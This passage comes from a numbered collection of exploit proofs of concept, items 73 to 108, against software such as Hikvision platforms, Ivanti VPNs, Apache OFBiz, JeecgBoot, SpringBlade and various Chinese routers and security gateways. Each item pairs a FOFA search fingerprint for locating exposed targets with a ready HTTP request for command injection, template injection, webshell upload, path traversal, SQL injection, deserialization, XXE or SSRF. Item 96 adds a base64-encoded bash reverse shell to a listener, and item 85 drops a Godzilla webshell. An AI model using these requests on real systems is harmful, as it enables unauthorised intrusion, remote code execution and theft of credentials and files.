S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

The xmlValue parameter is parsed with external entities enabled. Decoded it is the following document; the `]>` closing the DOCTYPE and the matching <d>...</d> tags are required, otherwise the parser rejects the document before it reaches the entity reference:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<Signature><Field><a Index="ProtectItem">true</a><b Index="Caption">caption</b><c Index="ID">id</c><d Index="VALUE">&xxe;</d></Field></Signature>

The entity expands to the contents of c:\windows\win.ini inside the VALUE field.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The time value reaches a shell unquoted, so the backticks run ifconfig and redirect its output into the cgi-bin directory. Then fetch the file:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

The UnitCode value is rendered as a FreeMarker template (server-side template injection); freemarker.template.utility.Execute runs the command and the marker file lands in the ROOT web application. Then fetch it:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

The bundled CuteEditor upload handler accepts both the .aspx extension and the caller-chosen folder; look for 1.aspx under the folder given in the form (/upload/udplog).

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

The target field chooses the directory inside the web root. Verify:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

The path value is handed to a shell unfiltered; a hit returns the output of id.

80. Superdata (速达) Tianyao (天耀) DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

The report parameter is used as a path, so `../` escapes the report directory and the raw request body becomes a JSP in the web root. Verify:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

Sent with an empty user name and login handle -1 (no session), cmd 255 still returns the account data including passwords.

82. Sifudi (思福迪) LOGBASE operations security management (bastion) system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

The z2 value is spliced into a shell command line; the closing quote, pipe and semicolon make it run id.

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

The command travels in the Cmd header; the 8.8 KB JSON body, elided as PAYLOAD, is what makes the report module run it.

84. JeecgBoot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
 "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

Same FreeMarker Execute primitive as item 76: the sql field is rendered as a template before it is used, and the DNSLog callback shows the hit (replace the dnslog.pw host with your own).

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request below drops a Godzilla webshell:
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

The accountId traversal writes the payload under tomcat/webapps; the shell then answers at http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The host value is spliced into the ping command line; the %0a newlines start a second command and ${IFS} stands in for a space, so a hit returns /etc/passwd.

87. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The suffix parameter is appended to the storage path, so its traversal decides the final location and name. Verify at:

/jfhatuwe.php

88. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a newline followed by `echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php`, so the injected command writes the file into the web UI directory. Verify at:

/txzfsrur.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

The %70 in the path is an encoded p: the URL still resolves to editflow_manager.jsp while an extension check on the raw path does not see .jsp. A response containing 24642 (111*222) confirms the injection.

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

jsondata[ip] is used as the ping target without validation, so a command such as ipconfig runs in its place.

91. Hikvision integrated security management platform (综合安防管理平台) orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Two tricks stacked: `..;/` is the Tomcat path-parameter traversal that routes through the /center/api/task prefix to reach the orgManage download handler, and fileName then traverses out of the download directory to /etc/passwd.

92. Hikvision operations management center session command execution
Fastjson deserialization
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

The Fastjson payload in the JSON body, elided as PAYLOAD, executes the command given in the Testcmd header.

93. Qi An Xin Legendsec (奇安信网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

The file keeps its submitted name under /attachements/ (the product's own spelling). Verify:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin NetGod SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then request the uploaded file:
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA: app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA: app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA: body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA: app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA: app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA: icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA: body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA: body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA: body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA: title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA: body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA: body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA: body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: 替换为自己的
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA: "dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
